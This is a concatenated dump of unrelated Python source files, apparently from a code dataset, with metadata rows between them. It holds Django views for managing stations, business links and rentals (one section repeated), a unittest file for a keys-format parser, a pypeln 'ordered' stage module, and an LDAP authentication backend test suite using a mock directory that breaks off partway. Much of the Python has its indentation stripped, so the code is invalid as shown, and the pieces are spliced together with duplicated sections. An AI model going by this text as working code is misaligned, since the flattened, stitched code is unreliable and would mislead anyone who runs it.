class StationViewUpdate(LoginRequiredMixin, SuccessMessageMixin, ActivitySendMixin, UpdateView):
context_object_name = 'station'
model = Station
success_message = "%(name)s was updated successfully!"
template_name = "station/station_form.html"
activity_verb = 'updated station'
fields = "__all__"
def dispatch(self, *args, **kwargs):
station = get_object_or_404(Station, pk=self.kwargs.get('pk', '-1'))
user_businesses = self.request.user.businessmembership_set.all()
can_modify = station.stationbusiness_set.all().filter(business__in=user_businesses)
if can_modify:
return super(StationViewUpdate, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to update this station.")
return redirect('station_detail', pk=self.kwargs['pk'])
def get_success_url(self):
return reverse_lazy('station_detail', kwargs={'pk': self.object.pk})
def get_context_data(self, **kwargs):
context = super(StationViewUpdate, self).get_context_data(**kwargs)
context['action'] = "Update"
return context
class StationViewDelete(LoginRequiredMixin, ActivitySendMixin, DeleteView):
context_object_name = 'station'
model = Station
success_url = reverse_lazy('base')
template_name = "station/station_form.html"
activity_verb = 'deleted station'
target_object_valid = False
def dispatch(self, *args, **kwargs):
station = get_object_or_404(Station, pk=self.kwargs.get('pk', '-1'))
user_businesses = self.request.user.businessmembership_set.all()
can_modify = station.stationbusiness_set.all().filter(business__in=user_businesses)
if can_modify:
return super(StationViewDelete, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to delete this station.")
return redirect('station_detail', pk=station.pk)
def get_success_url(self):
return self.success_url
def get_context_data(self, **kwargs):
context = super(StationViewDelete, self).get_context_data(**kwargs)
context['action'] = "Delete"
return context
"""
Station Business Association generic views
"""
class StationBusinessViewCreate(LoginRequiredMixin, SuccessMessageMixin, ActivitySendMixin, CreateView):
context_object_name = 'stationbusiness'
model = StationBusiness
template_name = "station/stationbusiness_form.html"
activity_verb = 'created station business association'
success_message = "%(station)s: %(business)s relation successfully created!"
form_class = StationBusinessForm
def dispatch(self, *args, **kwargs):
station = get_object_or_404(Station, pk=self.kwargs.get('station_pk', '-1'))
user_businesses = self.request.user.businessmembership_set.all()
can_modify = station.stationbusiness_set.all().filter(business__in=user_businesses)
if can_modify:
return super(StationBusinessViewCreate, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to create this station business.")
return redirect('station_detail', pk=station.pk)
def get_form(self, form_class):
return form_class(station_pk=self.kwargs['station_pk'], **self.get_form_kwargs())
def get_success_url(self):
        return reverse_lazy('station_detail', kwargs={'pk': self.kwargs['station_pk']})
def get_context_data(self, **kwargs):
context = super(StationBusinessViewCreate, self).get_context_data(**kwargs)
context['station'] = Station.objects.get(pk=self.kwargs['station_pk'])
return context
class StationBusinessViewDelete(LoginRequiredMixin, ActivitySendMixin, DeleteView):
context_object_name = 'stationbusiness'
model = StationBusiness
template_name = "station/stationbusiness_form.html"
activity_verb = 'deleted station business association'
target_object_valid = False
def get_success_url(self):
return reverse_lazy('station_detail', kwargs={'pk': self.object.station.pk})
def dispatch(self, *args, **kwargs):
stationbusiness = get_object_or_404(StationBusiness, pk=self.kwargs.get('pk', '-1'))
business = stationbusiness.business
station = stationbusiness.station
user_businesses = self.request.user.businessmembership_set.all()
can_modify = business.stationbusiness_set.all().filter(business__in=user_businesses)
last_business = len(station.stationbusiness_set.all()) == 1
if can_modify:
if last_business:
messages.warning(self.request, "You cannot delete the last station business for this station!")
return redirect('station_detail', pk=station.pk)
return super(StationBusinessViewDelete, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to delete this a station business.")
return redirect('station_detail', pk=station.pk)
def get_context_data(self, **kwargs):
context = super(StationBusinessViewDelete, self).get_context_data(**kwargs)
context['station'] = self.object.station
return context
"""
Station Rental generic views
"""
class StationRentalViewUpdate(LoginRequiredMixin, ActivitySendMixin, SuccessMessageMixin, UpdateView):
model = StationRental
context_object_name = 'stationrental'
template_name = "station/stationrental_form.html"
activity_verb = 'updated station rental'
success_message = '%(equipment)s rental successfully updated!'
form_class = StationRentalForm
def get_success_url(self):
return reverse_lazy('station_detail', kwargs={'pk': self.object.station.pk})
def dispatch(self, *args, **kwargs):
station_rental = get_object_or_404(StationRental, pk=self.kwargs.get('pk', '-1'))
if self.request.user.is_staff:
return super(StationRentalViewUpdate, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "Only staff may update station rentals.")
return redirect('station_detail', pk=station_rental.station.pk)
def get_context_data(self, **kwargs):
context = super(StationRentalViewUpdate, self).get_context_data(**kwargs)
context['station'] = self.object.station
context['action'] = 'Update'
return context
class StationRentalViewDelete(LoginRequiredMixin, DeleteView):
model = StationRental
context_object_name = 'stationrental'
template_name = "station/stationrental_form.html"
    activity_verb = 'deleted station rental'
    success_message = '%(equipment)s rental successfully deleted!'
form_class = StationRentalForm
def get_success_url(self):
return reverse_lazy('station_detail', kwargs={'pk': self.object.station.pk})
def dispatch(self, *args, **kwargs):
station_rental = get_object_or_404(StationRental, pk=self.kwargs.get('pk', '-1'))
if self.request.user.is_staff:
return super(StationRentalViewDelete, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "Only staff may delete station rentals.")
return redirect('station_detail', pk=station_rental.station.pk)
def get_context_data(self, **kwargs):
context = super(StationRentalViewDelete, self).get_context_data(**kwargs)
context['station'] = self.object.station
context['action'] = 'Delete'
return context
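# --- Editor's sketch (illustration only) ---
# The URL names referenced above ('station_detail', 'business_detail', ...)
# imply a urlconf roughly like the following; the names come from the code,
# but the regex patterns themselves are assumptions:
#
#   from django.conf.urls import url
#   urlpatterns = [
#       url(r'^station/(?P<pk>\d+)/$', StationViewDetail.as_view(), name='station_detail'),
#       url(r'^station/(?P<station_uuid>[0-9a-f-]+)/$', StationUUIDRedirect, name='station_uuid_redirect'),
#       url(r'^business/(?P<business_pk>\d+)/station/new/$', StationViewCreate.as_view(), name='station_create'),
#   ]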
| 43.727273
| 112
| 0.715956
|
from apollo.choices import CHARGE_LIST_OPEN
from apollo.viewmixins import LoginRequiredMixin, ActivitySendMixin, StaffRequiredMixin
from applications.business.models import Business
from applications.charge_list.forms import ActivityChargeCatalog, TimeChargeCatalog, UnitChargeCatalog
from applications.charge_list.models import ChargeList
from applications.station.forms import StationBusinessForm, StationRentalForm
from applications.station.models import Station, StationBusiness, StationRental
from django.contrib import messages
from django.contrib.messages.views import SuccessMessageMixin
from django.core.urlresolvers import reverse_lazy
from django.shortcuts import get_object_or_404, redirect
from django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView
def StationUUIDRedirect(request, station_uuid=None):
station = get_object_or_404(Station, uuid=station_uuid)
    return redirect('station_detail', pk=station.pk)
class StationViewList(LoginRequiredMixin, ListView):
context_object_name = "stations"
model = Station
template_name = "station/station_list.html"
def get_context_data(self, **kwargs):
context = super(StationViewList, self).get_context_data(**kwargs)
return context
class StationViewDetail(LoginRequiredMixin, DetailView):
context_object_name = 'station'
model = Station
template_name = "station/station_detail.html"
def get_context_data(self, **kwargs):
context = super(StationViewDetail, self).get_context_data(**kwargs)
user_businesses = Business.objects.filter(businessmembership__user=self.request.user)
station_businesses = self.object.stationbusiness_set.all()
context['can_modify'] = len(station_businesses.filter(business__in=user_businesses)) >= 1
active_cl = ChargeList.objects.filter(station=self.object, status=CHARGE_LIST_OPEN)
if len(active_cl) == 1:
context['chargelist'] = active_cl[0]
price_list_pk = active_cl[0].price_list.pk
context['activitycharge_catalog'] = ActivityChargeCatalog(price_list_pk=price_list_pk)
context['timecharge_catalog'] = TimeChargeCatalog(price_list_pk=price_list_pk)
context['unitcharge_catalog'] = UnitChargeCatalog(price_list_pk=price_list_pk)
return context
class StationViewCreate(LoginRequiredMixin, SuccessMessageMixin, ActivitySendMixin, CreateView):
context_object_name = 'station'
model = Station
success_message = "%(name)s was created successfully!"
template_name = "station/station_form.html"
activity_verb = 'created station'
fields = "__all__"
def dispatch(self, *args, **kwargs):
business = get_object_or_404(Business, pk=self.kwargs.get('business_pk', '-1'))
user_businesses = self.request.user.businessmembership_set.all()
can_modify = user_businesses.filter(business=business)
if can_modify:
return super(StationViewCreate, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to create a station for this business.")
return redirect('business_detail', pk=business.pk)
def get_success_url(self):
business = get_object_or_404(Business, pk=self.kwargs.get('business_pk', '-1'))
StationBusiness.objects.create(business=business, station=self.object)
return reverse_lazy('station_detail', kwargs={'pk': self.object.pk})
def get_context_data(self, **kwargs):
context = super(StationViewCreate, self).get_context_data(**kwargs)
context['action'] = "Create New"
return context
class StationViewUpdate(LoginRequiredMixin, SuccessMessageMixin, ActivitySendMixin, UpdateView):
context_object_name = 'station'
model = Station
success_message = "%(name)s was updated successfully!"
template_name = "station/station_form.html"
activity_verb = 'updated station'
fields = "__all__"
def dispatch(self, *args, **kwargs):
station = get_object_or_404(Station, pk=self.kwargs.get('pk', '-1'))
user_businesses = self.request.user.businessmembership_set.all()
can_modify = station.stationbusiness_set.all().filter(business__in=user_businesses)
if can_modify:
return super(StationViewUpdate, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to update this station.")
return redirect('station_detail', pk=self.kwargs['pk'])
def get_success_url(self):
return reverse_lazy('station_detail', kwargs={'pk': self.object.pk})
def get_context_data(self, **kwargs):
context = super(StationViewUpdate, self).get_context_data(**kwargs)
context['action'] = "Update"
return context
class StationViewDelete(LoginRequiredMixin, ActivitySendMixin, DeleteView):
context_object_name = 'station'
model = Station
success_url = reverse_lazy('base')
template_name = "station/station_form.html"
activity_verb = 'deleted station'
target_object_valid = False
def dispatch(self, *args, **kwargs):
station = get_object_or_404(Station, pk=self.kwargs.get('pk', '-1'))
user_businesses = self.request.user.businessmembership_set.all()
can_modify = station.stationbusiness_set.all().filter(business__in=user_businesses)
if can_modify:
return super(StationViewDelete, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to delete this station.")
return redirect('station_detail', pk=station.pk)
def get_success_url(self):
return self.success_url
def get_context_data(self, **kwargs):
context = super(StationViewDelete, self).get_context_data(**kwargs)
context['action'] = "Delete"
return context
class StationBusinessViewCreate(LoginRequiredMixin, SuccessMessageMixin, ActivitySendMixin, CreateView):
context_object_name = 'stationbusiness'
model = StationBusiness
template_name = "station/stationbusiness_form.html"
activity_verb = 'created station business association'
success_message = "%(station)s: %(business)s relation successfully created!"
form_class = StationBusinessForm
def dispatch(self, *args, **kwargs):
station = get_object_or_404(Station, pk=self.kwargs.get('station_pk', '-1'))
user_businesses = self.request.user.businessmembership_set.all()
can_modify = station.stationbusiness_set.all().filter(business__in=user_businesses)
if can_modify:
return super(StationBusinessViewCreate, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to create this station business.")
return redirect('station_detail', pk=station.pk)
def get_form(self, form_class):
return form_class(station_pk=self.kwargs['station_pk'], **self.get_form_kwargs())
def get_success_url(self):
        return reverse_lazy('station_detail', kwargs={'pk': self.kwargs['station_pk']})
def get_context_data(self, **kwargs):
context = super(StationBusinessViewCreate, self).get_context_data(**kwargs)
context['station'] = Station.objects.get(pk=self.kwargs['station_pk'])
return context
class StationBusinessViewDelete(LoginRequiredMixin, ActivitySendMixin, DeleteView):
context_object_name = 'stationbusiness'
model = StationBusiness
template_name = "station/stationbusiness_form.html"
activity_verb = 'deleted station business association'
target_object_valid = False
def get_success_url(self):
return reverse_lazy('station_detail', kwargs={'pk': self.object.station.pk})
def dispatch(self, *args, **kwargs):
stationbusiness = get_object_or_404(StationBusiness, pk=self.kwargs.get('pk', '-1'))
business = stationbusiness.business
station = stationbusiness.station
user_businesses = self.request.user.businessmembership_set.all()
can_modify = business.stationbusiness_set.all().filter(business__in=user_businesses)
last_business = len(station.stationbusiness_set.all()) == 1
if can_modify:
if last_business:
messages.warning(self.request, "You cannot delete the last station business for this station!")
return redirect('station_detail', pk=station.pk)
return super(StationBusinessViewDelete, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "You do not have permissions to delete this a station business.")
return redirect('station_detail', pk=station.pk)
def get_context_data(self, **kwargs):
context = super(StationBusinessViewDelete, self).get_context_data(**kwargs)
context['station'] = self.object.station
return context
class StationRentalViewUpdate(LoginRequiredMixin, ActivitySendMixin, SuccessMessageMixin, UpdateView):
model = StationRental
context_object_name = 'stationrental'
template_name = "station/stationrental_form.html"
activity_verb = 'updated station rental'
success_message = '%(equipment)s rental successfully updated!'
form_class = StationRentalForm
def get_success_url(self):
return reverse_lazy('station_detail', kwargs={'pk': self.object.station.pk})
def dispatch(self, *args, **kwargs):
station_rental = get_object_or_404(StationRental, pk=self.kwargs.get('pk', '-1'))
if self.request.user.is_staff:
return super(StationRentalViewUpdate, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "Only staff may update station rentals.")
return redirect('station_detail', pk=station_rental.station.pk)
def get_context_data(self, **kwargs):
context = super(StationRentalViewUpdate, self).get_context_data(**kwargs)
context['station'] = self.object.station
context['action'] = 'Update'
return context
class StationRentalViewDelete(LoginRequiredMixin, DeleteView):
model = StationRental
context_object_name = 'stationrental'
template_name = "station/stationrental_form.html"
    activity_verb = 'deleted station rental'
    success_message = '%(equipment)s rental successfully deleted!'
form_class = StationRentalForm
def get_success_url(self):
return reverse_lazy('station_detail', kwargs={'pk': self.object.station.pk})
def dispatch(self, *args, **kwargs):
station_rental = get_object_or_404(StationRental, pk=self.kwargs.get('pk', '-1'))
if self.request.user.is_staff:
return super(StationRentalViewDelete, self).dispatch(*args, **kwargs)
else:
messages.warning(self.request, "Only staff may delete station rentals.")
return redirect('station_detail', pk=station_rental.station.pk)
def get_context_data(self, **kwargs):
context = super(StationRentalViewDelete, self).get_context_data(**kwargs)
context['station'] = self.object.station
context['action'] = 'Delete'
return context
| true
| true
|
1c49399312452b6cbddff79a357ccab254f44b19
| 1,296
|
py
|
Python
|
tests/keysformat.py
|
sdss/opscore
|
dd4f2b2ad525fe3dfe3565463de2c079a7e1232e
|
[
"BSD-3-Clause"
] | null | null | null |
tests/keysformat.py
|
sdss/opscore
|
dd4f2b2ad525fe3dfe3565463de2c079a7e1232e
|
[
"BSD-3-Clause"
] | 1
|
2021-08-17T21:08:14.000Z
|
2021-08-17T21:08:14.000Z
|
tests/keysformat.py
|
sdss/opscore
|
dd4f2b2ad525fe3dfe3565463de2c079a7e1232e
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
"""Unit tests for opscore.protocols.keysformat
"""
# Created 18-Nov-2008 by David Kirkby (dkirkby@uci.edu)
import unittest
import opscore.protocols.keys as protoKeys
import opscore.protocols.keysformat as protoKeysFormat
class KeysFormatTest(unittest.TestCase):
def setUp(self):
self.p = protoKeysFormat.KeysFormatParser()
def test00(self):
"Valid format string without dict"
self.p.parse("key1 key2 key3")
self.p.parse("key1 key2 [key3]")
self.p.parse("key1 (key2 [key3])")
self.p.parse("@key1 key2 key3")
self.p.parse("key1 [@key2 [key3]]")
self.p.parse("key1 [@key2 [key3]] raw")
def test01(self):
"Valid format string with dict"
protoKeys.CmdKey.setKeys(
protoKeys.KeysDictionary(
"<command>",
(1, 0),
protoKeys.Key("key1"),
protoKeys.Key("key2"),
protoKeys.Key("key3"),
)
)
self.p.parse("<key1> <key2> <key3>")
self.p.parse("<key1> <key2> [<key3>]")
self.p.parse("<key1> (<key2> [<key3>])")
self.p.parse("@<key1> <key2> <key3>")
self.p.parse("<key1> [@<key2> [<key3>]]")
if __name__ == "__main__":
unittest.main()
| 29.454545
| 55
| 0.566358
|
import unittest
import opscore.protocols.keys as protoKeys
import opscore.protocols.keysformat as protoKeysFormat
class KeysFormatTest(unittest.TestCase):
def setUp(self):
self.p = protoKeysFormat.KeysFormatParser()
def test00(self):
self.p.parse("key1 key2 key3")
self.p.parse("key1 key2 [key3]")
self.p.parse("key1 (key2 [key3])")
self.p.parse("@key1 key2 key3")
self.p.parse("key1 [@key2 [key3]]")
self.p.parse("key1 [@key2 [key3]] raw")
def test01(self):
protoKeys.CmdKey.setKeys(
protoKeys.KeysDictionary(
"<command>",
(1, 0),
protoKeys.Key("key1"),
protoKeys.Key("key2"),
protoKeys.Key("key3"),
)
)
self.p.parse("<key1> <key2> <key3>")
self.p.parse("<key1> <key2> [<key3>]")
self.p.parse("<key1> (<key2> [<key3>])")
self.p.parse("@<key1> <key2> <key3>")
self.p.parse("<key1> [@<key2> [<key3>]]")
if __name__ == "__main__":
unittest.main()
| true
| true
|
1c4939aa892f9cb888046d7e51fce1e1a1ca183e
| 2,308
|
py
|
Python
|
pypeln/task/api/ordered.py
|
isaacjoy/pypeln
|
5909376b30fe25fd869e49e4e46b7782d48f1be2
|
[
"MIT"
] | null | null | null |
pypeln/task/api/ordered.py
|
isaacjoy/pypeln
|
5909376b30fe25fd869e49e4e46b7782d48f1be2
|
[
"MIT"
] | null | null | null |
pypeln/task/api/ordered.py
|
isaacjoy/pypeln
|
5909376b30fe25fd869e49e4e46b7782d48f1be2
|
[
"MIT"
] | null | null | null |
import bisect
import typing as tp
from pypeln import utils as pypeln_utils
from pypeln.utils import A, B, T
from ..stage import Stage
from ..worker import ProcessFn, Worker
from .to_stage import to_stage
class Ordered(tp.NamedTuple):
async def __call__(self, worker: Worker, **kwargs):
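        # Buffer every incoming element, keeping the buffer sorted (elements
        # compare by their order of creation on the source iterable, per the
        # `ordered` docstring below), then flush in order once the input ends.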
elems = []
async for elem in worker.stage_params.input_queue:
bisect.insort(elems, elem)
for _ in range(len(elems)):
await worker.stage_params.output_queues.put(elems.pop(0))
@tp.overload
def ordered(
stage: tp.Union[Stage[A], tp.Iterable[A], tp.AsyncIterable[A]],
) -> Stage[A]:
...
@tp.overload
def ordered() -> pypeln_utils.Partial[Stage[A]]:
...
def ordered(
stage: tp.Union[
Stage[A], tp.Iterable[A], tp.AsyncIterable[A], pypeln_utils.Undefined
] = pypeln_utils.UNDEFINED,
) -> tp.Union[Stage[A], pypeln_utils.Partial[Stage[A]]]:
"""
Creates a stage that sorts its elements based on their order of creation on the source iterable(s) of the pipeline.
```python
import pypeln as pl
import random
import time
def slow_squared(x):
time.sleep(random.random())
return x ** 2
stage = range(5)
stage = pl.process.map(slow_squared, stage, workers = 2)
stage = pl.process.ordered(stage)
print(list(stage)) # [0, 1, 4, 9, 16]
```
!!! note
        `ordered` will work even if the previous stages are from different `pypeln` modules, but it may not work if you introduce an intermediate external iterable stage.
!!! warning
        This stage will not yield until it has accumulated all of the elements from the previous stage; use it only if all elements fit in memory.
Arguments:
stage: A Stage, Iterable, or AsyncIterable.
Returns:
        If the `stage` parameter is given then this function returns an iterable, else it returns a `Partial`.
"""
if isinstance(stage, pypeln_utils.Undefined):
return pypeln_utils.Partial(lambda stage: ordered(stage))
stage = to_stage(stage)
return Stage(
process_fn=Ordered(),
workers=1,
maxsize=0,
timeout=0,
total_sources=1,
dependencies=[stage],
on_start=None,
on_done=None,
f_args=[],
)
| 25.644444
| 169
| 0.646014
|
import bisect
import typing as tp
from pypeln import utils as pypeln_utils
from pypeln.utils import A, B, T
from ..stage import Stage
from ..worker import ProcessFn, Worker
from .to_stage import to_stage
class Ordered(tp.NamedTuple):
async def __call__(self, worker: Worker, **kwargs):
elems = []
async for elem in worker.stage_params.input_queue:
bisect.insort(elems, elem)
for _ in range(len(elems)):
await worker.stage_params.output_queues.put(elems.pop(0))
@tp.overload
def ordered(
stage: tp.Union[Stage[A], tp.Iterable[A], tp.AsyncIterable[A]],
) -> Stage[A]:
...
@tp.overload
def ordered() -> pypeln_utils.Partial[Stage[A]]:
...
def ordered(
stage: tp.Union[
Stage[A], tp.Iterable[A], tp.AsyncIterable[A], pypeln_utils.Undefined
] = pypeln_utils.UNDEFINED,
) -> tp.Union[Stage[A], pypeln_utils.Partial[Stage[A]]]:
if isinstance(stage, pypeln_utils.Undefined):
return pypeln_utils.Partial(lambda stage: ordered(stage))
stage = to_stage(stage)
return Stage(
process_fn=Ordered(),
workers=1,
maxsize=0,
timeout=0,
total_sources=1,
dependencies=[stage],
on_start=None,
on_done=None,
f_args=[],
)
| true
| true
|
1c493a6ccaff1cb394bb3af2c0302efee6de17c6
| 19,882
|
py
|
Python
|
tests/unit/test_ldap_backend.py
|
geolaz/st2-auth-backend-ldap
|
e0deebc5109adca39b41a851b359d5b88943229a
|
[
"Apache-2.0"
] | 16
|
2015-09-05T16:05:36.000Z
|
2022-02-22T12:48:58.000Z
|
tests/unit/test_ldap_backend.py
|
geolaz/st2-auth-backend-ldap
|
e0deebc5109adca39b41a851b359d5b88943229a
|
[
"Apache-2.0"
] | 19
|
2016-02-26T23:36:30.000Z
|
2021-03-25T14:28:12.000Z
|
tests/unit/test_ldap_backend.py
|
geolaz/st2-auth-backend-ldap
|
e0deebc5109adca39b41a851b359d5b88943229a
|
[
"Apache-2.0"
] | 26
|
2016-03-29T18:47:46.000Z
|
2021-03-25T08:35:03.000Z
|
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ldap
import logging
import os
import re
import sys
import unittest2
import mock
from mockldap import MockLdap
from mockldap.recording import RecordedMethod
from st2auth_ldap_backend import ldap_backend
from st2auth_ldap_backend.ldap_backend import LDAPAuthenticationBackend
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
DEFAULT_URI = 'ldap://fakeldap.example.com/'
class LDAPAuthenticationBackendTestCase(unittest2.TestCase):
"""
A simple test case showing off some of the basic features of mockldap.
"""
connect_methods = ['initialize', 'set_option', 'set_option']
directory = {
'dc=com': {'dc': ['com']},
'dc=example,dc=com': {'dc': ['example']},
'ou=users,dc=example,dc=com': {'ou': ['users'], 'objectClass': ['groupOfNames'], 'member': ['uid=sarah_connor,ou=users,dc=example,dc=com', 'uid=john_connor,ou=users,dc=example,dc=com']},
'cn=manager,dc=example,dc=com': {'cn': ['manager'], 'userPassword': ['ldaptest']},
'uid=sarah_connor,ou=users,dc=example,dc=com': { 'uid': ['sarah_connor'], 'userPassword': ['Reece4ever'], 'objectclass': ['inetOrgPerson', 'posixAccount', 'person', 'top'] },
'uid=john_connor,ou=users,dc=example,dc=com': { 'uid': ['john_connor'], 'userPassword': ['HastaLavista'], 'objectclass': ['inetOrgPerson', 'posixAccount', 'person', 'top'] },
'cn=resistance,ou=groups,dc=example,dc=com': { 'cn': ['resistance'], 'description': ['memberOf'], 'memberuid': ['sarah_connor', 'john_connor'], 'objectclass': ['posixGroup', 'top']}
}
@classmethod
def setUpClass(cls):
# We only need to create the MockLdap instance once. The content we
# pass in will be used for all LDAP connections.
cls.mockldap = MockLdap(cls.directory)
@classmethod
def tearDownClass(cls):
del cls.mockldap
def setUp(self):
# Patch ldap.initialize
self.mockldap.start()
self.ldapobj = self.mockldap['ldap://fakeldap.example.com/']
# needs decorator to record calling 'result' method
self.mock_referral = []
self.ldapobj._result = self.ldapobj.result
# Note:
# These side_effect mocks are stopgap measures until ldapmock module implements
# the processing to get entries synchronously at the 'result' method.
# extending 'result' method of ldapmock module to enables get objects synchronously
def side_effect_result(*args, **kwargs):
def result(ldapobj, msgid, all):
if all:
# normal processing of mockldap
return (ldap.RES_SEARCH_RESULT, self._sync_results)
else:
if self._sync_results:
return (ldap.RES_SEARCH_ENTRY, [self._sync_results.pop()])
elif self.mock_referral:
# when mock_referrals are defined, this returns referral object
return (ldap.RES_SEARCH_REFERENCE, [self.mock_referral.pop()])
else:
# the case of test that dereferences referral object
return (ldap.RES_SEARCH_RESULT, None)
            if self._sync_results is None:
# get entry objects through the original 'result' method of ldapmock module
self._sync_results = self.ldapobj._result(*args, **kwargs)[1]
return result(self.ldapobj, *args, **kwargs)
else:
# call result method through RecordedMethod for tracking method calling of LDAPObject
return RecordedMethod(result, self.ldapobj)(*args, **kwargs)
self.ldapobj.result = mock.Mock(side_effect=side_effect_result)
self.ldapobj._search = self.ldapobj.search
def side_effect_search(*args, **kwargs):
# clear the interal state of test 'result' method
self._sync_results = None
return self.ldapobj._search(*args, **kwargs)
self.ldapobj.search = mock.Mock(side_effect=side_effect_search)
class LogHandler(logging.StreamHandler):
"""Mock logging handler to check log output"""
def __init__(self, *args, **kwargs):
self.reset()
logging.StreamHandler.__init__(self, *args, **kwargs)
def emit(self, record):
self.messages[record.levelname.lower()].append(record.getMessage())
def reset(self):
self.messages = {
'debug': [],
'info': [],
'warning': [],
'error': [],
'critical': [],
}
self.log_handler = LogHandler()
# set LogHandler for checking log outputs
ldap_backend.LOG.addHandler(self.log_handler)
def tearDown(self):
# Stop patching ldap.initialize and reset state.
self.mockldap.stop()
del self.ldapobj
def test_bind_anonymous(self):
result = _do_simple_bind('', '')
self.assertEquals(self.ldapobj.methods_called(), self.connect_methods + ['simple_bind_s', 'whoami_s', 'unbind'])
self.assertTrue(result)
def test_bind_dn_valid(self):
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest')
self.assertEquals(self.ldapobj.methods_called(), self.connect_methods + ['simple_bind_s', 'whoami_s', 'unbind'])
self.assertTrue(result)
def test_bind_dn_invalid_user(self):
result = _do_simple_bind('uid=invalid_user,ou=users,dc=example,dc=com', 'none')
self.assertEquals(self.ldapobj.methods_called(), self.connect_methods + ['simple_bind_s', 'unbind'])
self.assertFalse(result)
def test_bind_dn_invalid_password(self):
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'invalid_password')
self.assertEquals(self.ldapobj.methods_called(), self.connect_methods + ['simple_bind_s', 'unbind'])
self.assertFalse(result)
def test_search_valid_username(self):
username = 'sarah_connor'
password = 'Reece4ever'
user_dn = 'uid={},ou=users,dc=example,dc=com'.format(username)
mock_res = (user_dn, LDAPAuthenticationBackendTestCase.directory[user_dn])
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
self.ldapobj.search_s.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))([mock_res])
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=None, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
def test_search_invalid_username(self):
username = 'invalid_username'
password = 'Reece4ever'
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
mock_res = []
self.ldapobj.search_s.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))(mock_res)
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=None, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertFalse(result)
def test_search_invalid_password(self):
username = 'sarah_connor'
password = 'bad_password'
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
mock_res_id = 1234
mock_res = (ldap.RES_SEARCH_RESULT, None)
self.ldapobj._search.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))(mock_res_id)
self.ldapobj._result.seed(mock_res_id, all=0)(mock_res)
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=None, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertFalse(result)
def test_search_valid_username_valid_group(self):
username = 'john_connor'
password = 'HastaLavista'
user_dn = 'uid={},ou=users,dc=example,dc=com'.format(username)
mock_user_res_id = 1234
mock_user_res = (ldap.RES_SEARCH_RESULT, [(user_dn, LDAPAuthenticationBackendTestCase.directory[user_dn])])
groupname = 'resistance'
group_dn = 'cn={groupname},ou=groups,dc=example,dc=com'.format(groupname=groupname)
mock_group_res_id = 9999
mock_group_res = (ldap.RES_SEARCH_RESULT, [(group_dn, LDAPAuthenticationBackendTestCase.directory[group_dn])])
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
group = {"base_dn": "ou=groups,dc=example,dc=com", "search_filter": "(&(cn=%s)(memberUid={username}))"%groupname, "scope": "subtree"}
self.ldapobj._search.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))(mock_user_res_id)
self.ldapobj._search.seed(group["base_dn"], ldap.SCOPE_SUBTREE, group["search_filter"].format(username=username))(mock_group_res_id)
self.ldapobj._result.seed(mock_user_res_id, all=0)(mock_user_res)
self.ldapobj._result.seed(mock_group_res_id, all=0)(mock_group_res)
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=group, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'search', 'result', 'result', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
def test_search_valid_username_invalid_group(self):
username = 'john_connor'
password = 'HastaLavista'
user_dn = 'uid={},ou=users,dc=example,dc=com'.format(username)
mock_user_res_id = 1234
